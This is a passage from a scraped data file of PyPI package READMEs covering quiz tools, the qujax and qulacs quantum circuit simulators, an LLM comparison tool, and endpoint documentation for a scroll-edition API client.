the stack (so they can get the\nbackground they need to answer the question they got wrong).There are a number of example quizzes available in thequizzesdirectory. The example quizzes mostly focus on teaching software\ndevelopment tasks (POSIX shell utilities, Git version control, \u2026), but\nany material that can be presented in a textual prompt/response/check\nprocess should be fairly easy to develop. The quiz files are written\nin JSON, and the format should be fairly easy to understand after\nlooking through the examples.The quiz framework and answer processing are independent of the user\ninterface used to present the prompts and collect responses.\nCurrently only ainput()based command line interface exists, but\nother interfaces (e.g. a web server for browser-based interaction)\nshould be fairly straightforward.Here\u2019s an example typescript for one of the sample quizzes:$ ./pq.py quizzes/monty-python.json\nWhat is your favourite color?\n? blue\ncorrect\n\nWhat is the capital of Assyria?\n? Hmm\u2026\nincorrect\n\nWhat is your quest?\n? To seek the Holy Grail\ncorrect\n\nWhat is the capital of Assyria?\n? ?\n\nWhat is the capital of Assyria?\nSir Robin didn't know it either\n? I don't know that\ncorrect\n\nresults:\nquestion: What is your quest?\nanswers: 1/1 (1.00)\n you answered: To seek the Holy Grail\n which was: correct\n\nquestion: What is your favourite color?\nanswers: 1/1 (1.00)\n you answered: blue\n which was: correct\n\nquestion: What is the capital of Assyria?\nanswers: 1/2 (0.50)\n you answered: Hmm\u2026\n which was: incorrect\n you answered: I don't know that\n which was: correct\n\nanswered 3 of 4 questions\nof the answered questions, 3 (1.00) were answered correctlyThe unanswered question (\u201cWhat is your name?\u201d) wasn\u2019t asked because\nthe user successfully answered the question that depended on it (\u201cWhat\nis your quest?\u201d).Quizzer requires Python \u2265 3.3. If Pygments is installed, the command\nline prompt will be colored."} +{"package": "quizzes", "pacakge-description": "No description available on PyPI."} +{"package": "quizzical", "pacakge-description": "QuizzicalIntroductionQuizzical is a terminal-based quiz game, usingThe Open Trivia\nDatabaseas the back end.InstallingThe package can be installed usingpipx:$pipxinstallquizzicalOnce installed run thequizzicalcommand.Playing the gameHopefully the interface is pretty straightforward: run up the application,\nuse theNewbutton to create a new quiz with your choice of parameters,\nuse theRunbutton to play a game. When you run a new game you'll be shown\nthe parameters:and once you start you'll be shown a series of questions; press keys1,2,3or4to answer each one.Once the quiz is over you can view your results and see which answers were\nright and which were wrong:Getting helpIf you need help, or have any ideas, please feel free toraise an\nissueorstart a\ndiscussion.TODOThings I'm considering adding or addressing:Add session token support (less frequent question repeats).More quiz information in the main quiz list.Record scores for each game played, provide a history view.Allow answering a question with the mouse."} +{"package": "quizzii1", "pacakge-description": "quizzquizz\u10db\u10dc\u10d8\u10e8\u10d5\u10dc\u10d4\u10da\u10dd\u10d1\u10d8\u10e1 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e2\u10d0\u10dc\u10d0\u10d3 \u10e3\u10dc\u10d3\u10d0 \u10d2\u10d0\u10db\u10dd\u10d5\u10d8\u10eb\u10d0\u10ee\u10dd\u10d7 fib_next \u10ea\u10d5\u10da\u10d0\u10d3\u10d8, print \u10d0\u10e0 \u10e1\u10ed\u10d8\u10e0\u10d3\u10d4\u10d1\u10d0."} +{"package": "qujax", "pacakge-description": "qujaxInstallationQuick startPure state simulationMixed state simulationConverting from TKETExamplesContributingCiting qujaxAPI Referencequjax is aJAX-based Python library for the classical simulation of quantum circuits. It is designed to besimple,fastandflexible.It follows a functional programming design by translating circuits into pure functions. This allows qujax toseamlessly interface with JAX, enabling direct access to its powerful automatic differentiation tools, just-in-time compiler, vectorization capabilities, GPU/TPU integration and growing ecosystem of packages.qujax can be used both for pure and for mixed quantum state simulation. It not only supports the standard gate set, but also allows user-defined custom operations, including general quantum channels, enabling the user to e.g. model device noise and errors.An overview of the core functionalities of qujax can be found in theQuick startsection. More advanced use-cases, including the training of parameterised quantum circuits, are listed inExamples.Installationqujax ishosted on PyPIand can be installed via the pip package managerpip install qujaxQuick startImportant note: qujax circuit parameters are expressed in units of $\\pi$ (e.g. in the range $[0,2]$ as opposed to $[0, 2\\pi]$).Pure state simulationWe start by defining the quantum gates making up the circuit, along with the qubits that they act on and the indices of the parameters for each gate.A list of all gates can be foundhere(custom operations can be included bypassing an array or functioninstead of a string).fromjaximportnumpyasjnpimportqujax# List of quantum gatescircuit_gates=['H','Ry','CZ']# Indices of qubits the gates will be applied tocircuit_qubit_inds=[[0],[0],[0,1]]# Indices of parameters each parameterised gate will usecircuit_params_inds=[[],[0],[]]qujax.print_circuit(circuit_gates,circuit_qubit_inds,circuit_params_inds);# q0: -----H-----Ry[0]-----\u25ef---# |# q1: ---------------------CZ--We then translate the circuit to a pure functionparam_to_stthat takes a set of parameters and an (optional) initial quantum state as its input.param_to_st=qujax.get_params_to_statetensor_func(circuit_gates,circuit_qubit_inds,circuit_params_inds)param_to_st(jnp.array([0.1]))# Array([[0.58778524+0.j, 0. +0.j],# [0.80901706+0.j, 0. +0.j]], dtype=complex64)The optional initial state can be passed toparam_to_stusing thestatetensor_inargument. When it is not provided, the initial state defaults to $\\ket{0...0}$.Note that qujax represents quantum states asstatetensors. For example, for $N=4$ qubits, the corresponding vector space has $2^4$ dimensions, and a quantum state in this space is represented by an array with shape(2,2,2,2). The usual statevector representation with shape(16,)can be obtained by calling.flatten()or.reshape(-1)or.reshape(2**N)on this array.In the statetensor representation, the coefficient associated with e.g. basis state $\\ket{0101}$ is given byarr[0,1,0,1]; each axis corresponds to one qubit.param_to_st(jnp.array([0.1])).flatten()# Array([0.58778524+0.j, 0.+0.j, 0.80901706+0.j, 0.+0.j], dtype=complex64)Finally, by defining an observable, we can map the statetensor to an expectation value. A general observable is specified using lists of Pauli matrices, the qubits they act on, and the associated coefficients.For example, $Z_1Z_2Z_3Z_4 - 2 X_3$ would be written as[['Z','Z','Z','Z'], ['X']], [[1,2,3,4], [3]], [1., -2.].st_to_expectation=qujax.get_statetensor_to_expectation_func([['Z']],[[0]],[1.])Combiningparam_to_standst_to_expectationgives us a parameter to expectation function that can be automatically differentiated using JAX.fromjaximportvalue_and_gradparam_to_expectation=lambdaparam:st_to_expectation(param_to_st(param))expectation_and_grad=value_and_grad(param_to_expectation)expectation_and_grad(jnp.array([0.1]))# (Array(-0.3090171, dtype=float32),# Array([-2.987832], dtype=float32))Mixed state simulationMixed state simulations are analogous to the above, but with calls toget_params_to_densitytensor_funcandget_densitytensor_to_expectation_funcinstead.param_to_dt=qujax.get_params_to_densitytensor_func(circuit_gates,circuit_qubit_inds,circuit_params_inds)dt=param_to_dt(jnp.array([0.1]))dt.shape# (2, 2, 2, 2)dt_to_expectation=qujax.get_densitytensor_to_expectation_func([['Z']],[[0]],[1.])dt_to_expectation(dt)# Array(-0.3090171, dtype=float32)Similarly to a statetensor, which represents the reshaped $2^N$-dimensional statevector of a pure quantum state, adensitytensorrepresents the reshaped $2^N \\times 2^N$ density matrix of a mixed quantum state. This densitytensor has shape(2,) * 2 * N.For example, for $N=2$, and a mixed state $\\frac{1}{2} (\\ket{00}\\bra{11} + \\ket{11}\\bra{00} + \\ket{11}\\bra{11} + \\ket{00}\\bra{00})$, the corresponding densitytensordtis such thatdt[0,0,1,1] = dt[1,1,0,0] = dt[1,1,1,1] = dt[0,0,0,0] = 1/2, and all other entries are zero.The equivalent density matrix can be obtained by calling.reshape(2 ** N, 2 ** N).Converting from TKETOne can directly convert apytketcircuit using thetk_to_qujaxandtk_to_qujax_symbolicfunctions in thepytket-qujaxextension.An example of this can be found in thepytket-qujax_heisenberg_vqe.ipynbnotebook.ExamplesBelow are some use-case notebooks. These both illustrate the flexibility of qujax and the power of directly interfacing with JAX and its package ecosystem.heisenberg_vqe.ipynb- an implementation of the variational quantum eigensolver to find the ground state of a quantum Hamiltonian.maxcut_vqe.ipynb- an implementation of the variational quantum eigensolver to solve a MaxCut problem. Trains with Adam viaoptaxand uses more realistic stochastic parameter shift gradients.noise_channel.ipynb- uses the densitytensor simulator to fit the parameters of a depolarising noise channel.qaoa.ipynb- uses a problem-inspired QAOA ansatz to find the ground state of a quantum Hamiltonian. Demonstrates how to encode more sophisticated parameters that control multiple gates.barren_plateaus.ipynb- illustrates how to sample gradients of a cost function to identify the presence of barren plateaus. Uses batched/vectorized evaluation to speed up computation.reducing_jit_compilation_time.ipynb- explains how JAX compilation works and how that can lead to excessive compilation times when executing quantum circuits. Presents a solution for the case of circuits with a repeating structure.variational_inference.ipynb- uses a parameterised quantum circuit as a variational distribution to fit to a target probability mass function. Uses Adam viaoptaxto minimise the KL divergence between circuit and target distributions.classification.ipynb- train a quantum circuit for binary classification using data re-uploading.generative_modelling.ipynb- uses a parameterised quantum circuit as a generative model for a real life dataset. Trains via stochastic gradient Langevin dynamics on the maximum mean discrepancy between statetensor and dataset.Thepytketrepository also containstk_to_qujaximplementations for some of the above atpytket-qujax_classification.ipynb,pytket-qujax_heisenberg_vqe.ipynbandpytket-qujax_qaoa.ipynb.ContributingYou can open a bug report or a feature request by creating a newissue on GitHub.Pull requests are welcome! To open a new one, please go through the following steps:First fork the repo and create your branch fromdevelop.Commit your code and tests.Update the documentation, if required.Check the code lints (runblack . --checkandpylint */).Issue a pull request into thedevelopbranch.New commits ondevelopwill be merged intomainin the next release.Citing qujaxIf you have used qujax in your code or research, we kindly ask that you cite it. You can use the following BibTeX entry for this:@article{qujax2023,author={Duffield, Samuel and Matos, Gabriel and Johannsen, Melf},doi={10.21105/joss.05504},journal={Journal of Open Source Software},month=sep,number={89},pages={5504},title={{qujax: Simulating quantum circuits with JAX}},url={https://joss.theoj.org/papers/10.21105/joss.05504},volume={8},year={2023}}"} +{"package": "qujian1", "pacakge-description": "Example PackageThis is a simple example package. You can useGithub-flavored Markdownto write your content."} +{"package": "quke", "pacakge-description": "qukeCompare the answering capabilities of different LLMs - for example LlaMa, ChatGPT, Cohere, Falcon - against user provided document(s) and questions.Explore the docs \u00bbReport Bug\u00b7Request FeatureTable of ContentsAbout The ProjectBuilt WithGetting StartedPrerequisitesInstallationUsageBaseSpecify models and embeddingsExperimentsConfigurationSearch your own documentsLimitationsPrivacyLicenseContactAbout The ProjectCompare the answering capabilities of different LLMs - for example LlaMa, ChatGPT, Cohere, Falcon - against user provided document(s) and questions.Specify the different models, embedding tools and vector databases in configuration files.Maintain reproducable experiments reflecting combinations of these configurations.(back to top)Getting StartedPrerequisitesPoetryThe instructions assume a Python environment withPoetryinstalled. Development of the tool is done in Python 3.11. While Poetry is not actually needed for the tool to function, the examples assume Poetry is installed.API keysThe tool uses 3rd party hosted inference APIs. API keys need to be specified as environment variables.The services used:HuggingFaceOpenAICohereReplicateThe API keys can be specied in a.env file. Use the provided .env.example file as an example (enter your own API keys and rename it to '.env').At present, all services used in the example configuration have free tiers available.(back to top)InstallationNavigate to the directory that contains the pyproject.toml file, then execute thepoetryinstallcommand.(back to top)UsageFor the examples the project comes with a public financial document for a Canadian Bank (CIBC) as source pdf file.BaseIn order to run the first example, ensure to specify your HuggingFace API key.Use the commandpoetryrunquketo ask the default questions, using the default embedding and the default LLM.The answers provided by the LLM - in addition to various other logging messages - are saved in the ./output/ or ./multirun directories in separate date and time subdirectories, including in a file calledchat_session.md.The defaults are specified in the config.yaml file (in the ./quke/conf/ directory).(back to top)Specify models and embeddingsEnsure to specify your Cohere API key before running.As per the configuration files, the default LLM is Falcon and the default embedding uses HuggingFace embedding.To specify a different LLM - Cohere in this example - run the following:poetryrunqukeembedding=huggingfacellm=coherequestion=eps(back to top)ExperimentsEnsure to specify your OpenAI API key before running.The LLMs, embeddings, questions and other configurations can be captured in experiment config files. The commandpoetryrunquke+experiment=openaiuses an experiment file openai.yaml (see folder ./config/experiments) which specifies the LLM, embedding and questions to be used. It is equivalent to running:poetryrunqukeembedding=openaillm=gpt3-5question=epsMultiple experiments can be run at once as follows:Ensure to specify your Replicate API key before running.poetryrunquke--multirun+experiment=openai,llama2(back to top)ConfigurationLLMs, embeddings, questions, experiments and other items are specified in a set of configuration files. These are saved in the ./config directory.TheHydrapackage is used for configuration management. Their website explains more about the configuration system in general.Four different models are specified (ChatGPT, LlaMa2, Falcon, and Cohere); using 4 different APIs (OpenAI, HuggingFace, Cohere and Replicate).Additional LLMs (or embeddings, questions) can be set up by adding new configuration files.(back to top)Search your own documentsThe documents to be searched are stored in the ./docs/pdf directory. At present only pdf documents are considered.\nNote to setvectorstore_write_modetoappendoroverwritein the embedding configuration file (or delete the folder with the existing vector database, in the ./idata folder).(back to top)LimitationsThe free tiers for the third party services generally come with fairly strict limitations. They differ between services; and may differ over time.To try out the tool with your own documents it is best to start with a single small source document, no more than two questions and only one combination of LLM/embedding.Error messages due to limitations of the APIs are not always clearly indicated as such.(back to top)PrivacyThe tool uses third party APIs (OpenAI, HuggingFace, Cohere, Replicate). These process your source documents and your questions, to the extent that you provide these. They track your usage of their APIs. They may do other things; I do not know.The tool uses theLangChainPython package to interact with the third party services. I do not know if the package 'leaks' any of the data in any way.In general I do not know to what extent any of the data is encrypted during transmission.The tool shares no information with me.(back to top)Built With(back to top)LicenseDistributed under the MIT License. SeeLICENSE.txtfor more information.(back to top)ContactProject Link:https://github.com/ejoosterop/quke(back to top)"} +{"package": "qulacs", "pacakge-description": "QulacsQulacs is a Python/C++ library for fast simulation of large, noisy, or parametric quantum circuits.\nQulacs is developed at QunaSys, Osaka University, NTT, and Fujitsu.Qulacs is licensed under theMIT license.Quick Install for Pythonpip install qulacsIf your CPU is older than Intel Haswell architecture, the binary installed with the above command does not work. In this case, please install Qulacs with the following command.\nEven if your CPU is newer than Haswell, Qulacs installed with the below command shows better performance but takes a longer time. See \"Install Python library from source\" section for detail.pip install git+https://github.com/qulacs/qulacs.gitIf you have NVIDIA GPU and CUDA is installed, GPU-version can be installed with the following command:pip install qulacs-gpuFeaturesNoteQulacs-Osaka/qulacs-osaka was integrated into the qulacs/qulacs. For more details, please refer toInformationsection.Fast quantum circuit simulation with parallelized C/C++ backendNoisy quantum gate for simulation of NISQ devicesParametric quantum gates for variational methodsCircuit compression for fast simulationGPU support for fast simulationMany utility functions for researchPerformanceThe time for simulating random quantum circuits is compared with several quantum circuit simulators in November 2020.Seethe benchmark repositoryandSection VI and VII of our paperfor the detail of this benchmark.Note that the plots with names ending with \"opt\" and \"heavy opt\" perform circuit optimization for fast simulation, where the time for optimization is included in the execution time.Single-thread benchmarkMulti-thread benchmarkGPU benchmarkInstall Python library from sourceTo install Qulacs optimized for your system, we recommend the following install procedure for faster simulation of quantum circuits, while this requires a compiler and takes time for installation. In addition, you can enable or disable optimization features such as SIMD optimization, OpenMP parallelization, and GPU support.A binary that is installed via pip command is optimized for Haswell architecture. Thus, Qulacs installed via pip command does not work with a CPU older than Haswell. If your CPU is newer than Haswell, Qualcs built from source shows the better performance.RequirementsC++ compiler (gcc or VisualStudio)gcc/g++ >= 7.0.0 (checked in Linux, MacOS, cygwin, MinGW, and WSL)Microsoft VisualStudio C++ 2015 or laterBoost>= 1.71.0 (Minimum version tested in CI)Python >= 3.7CMake >= 3.0git(option) CUDA >= 8.0(option) AVX2 supportIf your system supports AVX2 instructions, SIMD optimization is automatically enabled.\nIf you want to enable GPU simulator, install qulacs throughqulacs-gpupackage or build from source.\nNote thatqulacs-gpuincludes CPU simulator. You don't need to install both.Qulacs is tested on the following systems.Ubuntu 20.04macOS Big Sur 11Windows Server 2019If you encounter some troubles, seetroubleshooting.How to installInstall with default options (Multi-thread without GPU):pip install .If AVX2 instructions are not supported, SIMD optimization is automatically disabled.Install with GPU support (CUDA is required):USE_GPU=Yes pip install .Install single-thread Qulacs:USE_OMP=No pip install .The number of threads used in Qulacs installed with default options can be controlled via the environment variableOMP_NUM_THREADSorQULACS_NUM_THREADS.\nWhileOMP_NUM_THREADSaffects the parallelization of other libraries,QULACS_NUM_THREADScontrols only the parallelization of QULACS.\nOr, if you want to force only Qulacs to use a single thread, You can install single-thread Qulacs with the above command.For development purpose, optional dependencies can be installed as follows.# Install development tools\npip install .[dev]\n# Install dependencies for document generation\npip install .[doc]Uninstall Qulacs:pip uninstall qulacsUse Qulacs as C++ libraryBuild with GCCStatic libraries of Qulacs can be built with the following commands:git clone https://github.com/qulacs/qulacs.git\ncd qulacs\n./script/build_gcc.shTo build shared libraries, executemake sharedat./qulacs/buildfolder.\nWhen you want to build with GPU, usebuild_gcc_with_gpu.shinstead ofbuild_gcc.sh.Then, you can build your codes with the following gcc command:g++-O2-I.//include-L.//lib.cpp-lvqcsim_static-lcppsim_static-lcsim_static-fopenmpIf you want to run your codes with GPU, includecppsim/state_gpu.hppand useQuantumStateGpuinstead ofQuantumStateand build with the following command:nvcc -O2 -I .//include -L .//lib .cu -lvqcsim_static -lcppsim_static -lcsim_static -lgpusim_static -D _USE_GPU -lcublas -Xcompiler -fopenmpBuild with MSVCStatic libraries of Qulacs can be built with the following command:git clone https://github.com/qulacs/qulacs.git\ncd qulacs\nscript/build_msvc_2017.batWhen you want to build with GPU, usebuild_msvc_2017_with_gpu.bat.\nIf you use MSVC with other versions, usebuild_msvc_2015.bator edit the generator name inbuild_msvc_2017.bat.Your C++ codes can be built with Qulacs with the following process:Create an empty project.Select \"x64\" as an active solution platform.Right Click your project name in Solution Explorer, and select \"Properties\".At \"VC++ Directories\" section, add the full path to./qulacs/includeto \"Include Directories\"At \"VC++ Directories\" section, add the full path to./qulacs/libto \"Library Directories\"At \"C/C++ -> Code Generation\" section, change \"Runtime library\" to \"Multi-threaded (/MT)\".At \"Linker -> Input\" section, addvqcsim_static.lib;cppsim_static.lib;csim_static.lib;to \"Additional Dependencies\".Tutorial and API documentsSee the following documents for tutorials.Python TutorialC++ TutorialManualExamplesPython sample codefromqulacsimportObservable,QuantumCircuit,QuantumStatefromqulacs.gateimportY,CNOT,mergestate=QuantumState(3)state.set_Haar_random_state()circuit=QuantumCircuit(3)circuit.add_X_gate(0)merged_gate=merge(CNOT(0,1),Y(1))circuit.add_gate(merged_gate)circuit.add_RX_gate(1,0.5)circuit.update_quantum_state(state)observable=Observable(3)observable.add_operator(2.0,\"X 2 Y 1 Z 0\")observable.add_operator(-3.0,\"Z 2\")value=observable.get_expectation_value(state)print(value)If you want to run it on GPU, install GPU-enabled qulacs and replaceQuantumStatein the above codes withQuantumStateGpu.C++ sample code#include#include#include#include#include#includeintmain(){QuantumStatestate(3);state.set_Haar_random_state();QuantumCircuitcircuit(3);circuit.add_X_gate(0);automerged_gate=gate::merge(gate::CNOT(0,1),gate::Y(1));circuit.add_gate(merged_gate);circuit.add_RX_gate(1,0.5);circuit.update_quantum_state(&state);Observableobservable(3);observable.add_operator(2.0,\"X 2 Y 1 Z 0\");observable.add_operator(-3.0,\"Z 2\");autovalue=observable.get_expectation_value(&state);std::cout<v1_editions_edition_id_artefact_groups_artefact_group_id_delete:%s\\n\"%e)Documentation for API EndpointsAll URIs are relative tohttp://localhostClassMethodHTTP requestDescriptionArtefactApiv1_editions_edition_id_artefact_groups_artefact_group_id_deleteDELETE/v1/editions/{editionId}/artefact-groups/{artefactGroupId}Deletes the specified artefact group.ArtefactApiv1_editions_edition_id_artefact_groups_artefact_group_id_getGET/v1/editions/{editionId}/artefact-groups/{artefactGroupId}Gets the details of a specific artefact group in the editionArtefactApiv1_editions_edition_id_artefact_groups_artefact_group_id_putPUT/v1/editions/{editionId}/artefact-groups/{artefactGroupId}Updates the details of an artefact group. The artefact group will now only contain the artefacts listed in the JSON payload. If the name is null, no change will be made, otherwise the name will also be updated.ArtefactApiv1_editions_edition_id_artefact_groups_getGET/v1/editions/{editionId}/artefact-groupsGets a listing of all artefact groups in the editionArtefactApiv1_editions_edition_id_artefact_groups_postPOST/v1/editions/{editionId}/artefact-groupsCreates a new artefact group with the submitted data. The new artefact must have a list of artefacts that belong to the group. It is not necessary to give the group a name.ArtefactApiv1_editions_edition_id_artefacts_artefact_id_deleteDELETE/v1/editions/{editionId}/artefacts/{artefactId}Deletes the specified artefactArtefactApiv1_editions_edition_id_artefacts_artefact_id_getGET/v1/editions/{editionId}/artefacts/{artefactId}Provides a listing of all artefacts that are part of the specified editionArtefactApiv1_editions_edition_id_artefacts_artefact_id_putPUT/v1/editions/{editionId}/artefacts/{artefactId}Updates the specified artefact. There are many possible attributes that can be changed for an artefact. The caller should only input only those that should be changed. Attributes with a null value will be ignored. For instance, setting the mask to null or "" will result in no changes to the current mask, and no value for the mask will be returned (or broadcast). Likewise, the transformation, name, or status message may be set to null and no change will be made to those entities (though any unchanged values will be returned along with the changed values and also broadcast to co-editors).ArtefactApiv1_editions_edition_id_artefacts_artefact_id_rois_getGET/v1/editions/{editionId}/artefacts/{artefactId}/roisProvides a listing of all rois belonging to an artefact in the specified editionArtefactApiv1_editions_edition_id_artefacts_artefact_id_text_fragments_getGET/v1/editions/{editionId}/artefacts/{artefactId}/text-fragmentsProvides a listing of text fragments that have text in the specified artefact. With the optional query parameter "suggested", this endpoint will also return any text fragment that the system suggests might have text in the artefact.ArtefactApiv1_editions_edition_id_artefacts_batch_transformation_postPOST/v1/editions/{editionId}/artefacts/batch-transformationUpdates the positional data for a batch of artefactsArtefactApiv1_editions_edition_id_artefacts_getGET/v1/editions/{editionId}/artefactsProvides a listing of all artefacts that are part of the specified editionArtefactApiv1_editions_edition_id_artefacts_postPOST/v1/editions/{editionId}/artefactsCreates a new artefact with the provided data. If no mask is provided, a placeholder mask will be created with the values: "POLYGON((0 0,1 1,1 0,0 0))" (the system requires a valid WKT polygon mask for every artefact). It is not recommended to leave the mask, name, or work status blank or null. It will often be advantageous to leave the transformation null when first creating a new artefact.CatalogueApiv1_catalogue_confirm_match_iaa_edition_catalog_to_text_fragment_id_deleteDELETE/v1/catalogue/confirm-match/{iaaEditionCatalogToTextFragmentId}Remove an existing imaged object and text fragment match, which is not correctCatalogueApiv1_catalogue_confirm_match_iaa_edition_catalog_to_text_fragment_id_postPOST/v1/catalogue/confirm-match/{iaaEditionCatalogToTextFragmentId}Confirm the correctness of an existing imaged object and text fragment matchCatalogueApiv1_catalogue_editions_edition_id_imaged_object_text_fragment_matches_getGET/v1/catalogue/editions/{editionId}/imaged-object-text-fragment-matchesGet a listing of all corresponding imaged objects and transcribed text fragment in a specified editionCatalogueApiv1_catalogue_imaged_objects_imaged_object_id_text_fragments_getGET/v1/catalogue/imaged-objects/{imagedObjectId}/text-fragmentsGet a listing of all text fragments matches that correspond to an imaged objectCatalogueApiv1_catalogue_manuscripts_manuscript_id_imaged_object_text_fragment_matches_getGET/v1/catalogue/manuscripts/{manuscriptId}/imaged-object-text-fragment-matchesGet a listing of all corresponding imaged objects and transcribed text fragment in a specified manuscriptCatalogueApiv1_catalogue_postPOST/v1/catalogueCreate a new matched pair for an imaged object and a text fragment along with the edition princeps informationCatalogueApiv1_catalogue_text_fragments_text_fragment_id_imaged_objects_getGET/v1/catalogue/text-fragments/{textFragmentId}/imaged-objectsGet a listing of all imaged objects that matches that correspond to a transcribed text fragmentEditionApiv1_editions_admin_share_requests_getGET/v1/editions/admin-share-requestsGet a list of requests issued by the current user for other users to become editors of a shared editionEditionApiv1_editions_confirm_editorship_token_postPOST/v1/editions/confirm-editorship/{token}Confirm addition of an editor to the specified editionEditionApiv1_editions_edition_id_add_editor_request_postPOST/v1/editions/{editionId}/add-editor-requestAdds an editor to the specified editionEditionApiv1_editions_edition_id_deleteDELETE/v1/editions/{editionId}Provides details about the specified edition and all accessible alternate editionsEditionApiv1_editions_edition_id_editors_editor_email_id_putPUT/v1/editions/{editionId}/editors/{editorEmailId}Changes the rights for an editor of the specified editionEditionApiv1_editions_edition_id_getGET/v1/editions/{editionId}Provides details about the specified edition and all accessible alternate editionsEditionApiv1_editions_edition_id_postPOST/v1/editions/{editionId}Creates a copy of the specified editionEditionApiv1_editions_edition_id_putPUT/v1/editions/{editionId}Updates data for the specified editionEditionApiv1_editions_edition_id_script_collection_getGET/v1/editions/{editionId}/script-collectionProvides spatial data for all letters in the editionEditionApiv1_editions_edition_id_script_lines_getGET/v1/editions/{editionId}/script-linesProvides spatial data for all letters in the edition organized and oriented by lines.EditionApiv1_editions_editor_invitations_getGET/v1/editions/editor-invitationsGet a list of invitations issued to the current user to become an editor of a shared editionEditionApiv1_editions_getGET/v1/editionsProvides a listing of all editions accessible to the current userImagedObjectApiv1_editions_edition_id_imaged_objects_getGET/v1/editions/{editionId}/imaged-objectsProvides a listing of imaged objects related to the specified edition, can include images and also their masks with optional.ImagedObjectApiv1_editions_edition_id_imaged_objects_imaged_object_id_getGET/v1/editions/{editionId}/imaged-objects/{imagedObjectId}Provides information for the specified imaged object related to the specified edition, can include images and also their masks with optional.ImagedObjectApiv1_imaged_objects_imaged_object_id_getGET/v1/imaged-objects/{imagedObjectId}Provides information for the specified imaged object.ImagedObjectApiv1_imaged_objects_imaged_object_id_text_fragments_getGET/v1/imaged-objects/{imagedObjectId}/text-fragmentsProvides a list of all text fragments that should correspond to the imaged object.ImagedObjectApiv1_imaged_objects_institutions_getGET/v1/imaged-objects/institutionsProvides a list of all institutional image providers.ImagedObjectApiv1_imaged_objects_institutions_institution_name_getGET/v1/imaged-objects/institutions/{institutionName}Provides a list of all institutional image providers.RoiApiv1_editions_edition_id_rois_batch_edit_postPOST/v1/editions/{editionId}/rois/batch-editProcesses a series of create/update/delete ROI requests in the given edition of a scrollRoiApiv1_editions_edition_id_rois_batch_postPOST/v1/editions/{editionId}/rois/batchCreates new sign ROI's in the given edition of a scrollRoiApiv1_editions_edition_id_rois_batch_putPUT/v1/editions/{editionId}/rois/batchUpdate existing sign ROI's in the given edition of a scrollRoiApiv1_editions_edition_id_rois_postPOST/v1/editions/{editionId}/roisCreates new sign ROI in the given edition of a scrollRoiApiv1_editions_edition_id_rois_roi_id_deleteDELETE/v1/editions/{editionId}/rois/{roiId}Deletes a sign ROI from the given edition of a scrollRoiApiv1_editions_edition_id_rois_roi_id_getGET/v1/editions/{editionId}/rois/{roiId}Get the details for a ROI in the given edition of a scrollRoiApiv1_editions_edition_id_rois_roi_id_putPUT/v1/editions/{editionId}/rois/{roiId}Update an existing sign ROI in the given edition of a scrollSignInterpretationApiv1_editions_edition_id_sign_interpretations_attributes_attribute_id_deleteDELETE/v1/editions/{editionId}/sign-interpretations-attributes/{attributeId}Delete an attribute from an editionSignInterpretationApiv1_editions_edition_id_sign_interpretations_attributes_attribute_id_putPUT/v1/editions/{editionId}/sign-interpretations-attributes/{attributeId}Change the details of an attribute in an editionSignInterpretationApiv1_editions_edition_id_sign_interpretations_attributes_getGET/v1/editions/{editionId}/sign-interpretations-attributesRetrieve a list of all possible attributes for an editionSignInterpretationApiv1_editions_edition_id_sign_interpretations_attributes_postPOST/v1/editions/{editionId}/sign-interpretations-attributesCreate a new attribute for an editionSignInterpretationApiv1_editions_edition_id_sign_interpretations_postPOST/v1/editions/{editionId}/sign-interpretationsCreates a new sign interpretationSignInterpretationApiv1_editions_edition_id_sign_interpretations_sign_interpretation_id_attributes_attribute_value_id_deleteDELETE/v1/editions/{editionId}/sign-interpretations/{signInterpretationId}/attributes/{attributeValueId}This deletes the specified attribute value from the specified sign interpretation.SignInterpretationApiv1_editions_edition_id_sign_interpretations_sign_interpretation_id_attributes_attribute_value_id_putPUT/v1/editions/{editionId}/sign-interpretations/{signInterpretationId}/attributes/{attributeValueId}This changes the values of the specified sign interpretation attribute, mainly used to change commentary.SignInterpretationApiv1_editions_edition_id_sign_interpretations_sign_interpretation_id_attributes_postPOST/v1/editions/{editionId}/sign-interpretations/{signInterpretationId}/attributesThis adds a new attribute to the specified sign interpretation.SignInterpretationApiv1_editions_edition_id_sign_interpretations_sign_interpretation_id_commentary_putPUT/v1/editions/{editionId}/sign-interpretations/{signInterpretationId}/commentaryUpdates the commentary of a sign interpretationSignInterpretationApiv1_editions_edition_id_sign_interpretations_sign_interpretation_id_deleteDELETE/v1/editions/{editionId}/sign-interpretations/{signInterpretationId}Deletes the sign interpretation in the route. The endpoint automatically manages the sign stream by connecting all the deleted sign's next and previous nodes.SignInterpretationApiv1_editions_edition_id_sign_interpretations_sign_interpretation_id_getGET/v1/editions/{editionId}/sign-interpretations/{signInterpretationId}Retrieve the details of a sign interpretation in an editionSignInterpretationApiv1_editions_edition_id_sign_interpretations_sign_interpretation_id_link_to_next_sign_interpretation_id_postPOST/v1/editions/{editionId}/sign-interpretations/{signInterpretationId}/link-to/{nextSignInterpretationId}Links two sign interpretations in the edition's sign streamSignInterpretationApiv1_editions_edition_id_sign_interpretations_sign_interpretation_id_unlink_from_next_sign_interpretation_id_postPOST/v1/editions/{editionId}/sign-interpretations/{signInterpretationId}/unlink-from/{nextSignInterpretationId}Links two sign interpretations in the edition's sign streamTextApiv1_editions_edition_id_lines_line_id_getGET/v1/editions/{editionId}/lines/{lineId}Retrieves all signs and their data from the given lineTextApiv1_editions_edition_id_text_fragments_getGET/v1/editions/{editionId}/text-fragmentsRetrieves the ids of all Fragments of all fragments in the given edition of a scrollTextApiv1_editions_edition_id_text_fragments_postPOST/v1/editions/{editionId}/text-fragmentsCreates a new text fragment in the given edition of a scrollTextApiv1_editions_edition_id_text_fragments_text_fragment_id_artefacts_getGET/v1/editions/{editionId}/text-fragments/{textFragmentId}/artefactsRetrieves the ids of all Artefacts in the given textFragmentNameTextApiv1_editions_edition_id_text_fragments_text_fragment_id_getGET/v1/editions/{editionId}/text-fragments/{textFragmentId}Retrieves all signs and their data from the given textFragmentNameTextApiv1_editions_edition_id_text_fragments_text_fragment_id_lines_getGET/v1/editions/{editionId}/text-fragments/{textFragmentId}/linesRetrieves the ids of all lines in the given textFragmentNameTextApiv1_editions_edition_id_text_fragments_text_fragment_id_putPUT/v1/editions/{editionId}/text-fragments/{textFragmentId}Updates the specified text fragment with the submitted propertiesUserApiv1_users_change_forgotten_password_postPOST/v1/users/change-forgotten-passwordUses the secret token from /users/forgot-password to validate a reset of the user's passwordUserApiv1_users_change_password_postPOST/v1/users/change-passwordChanges the password for the currently logged in 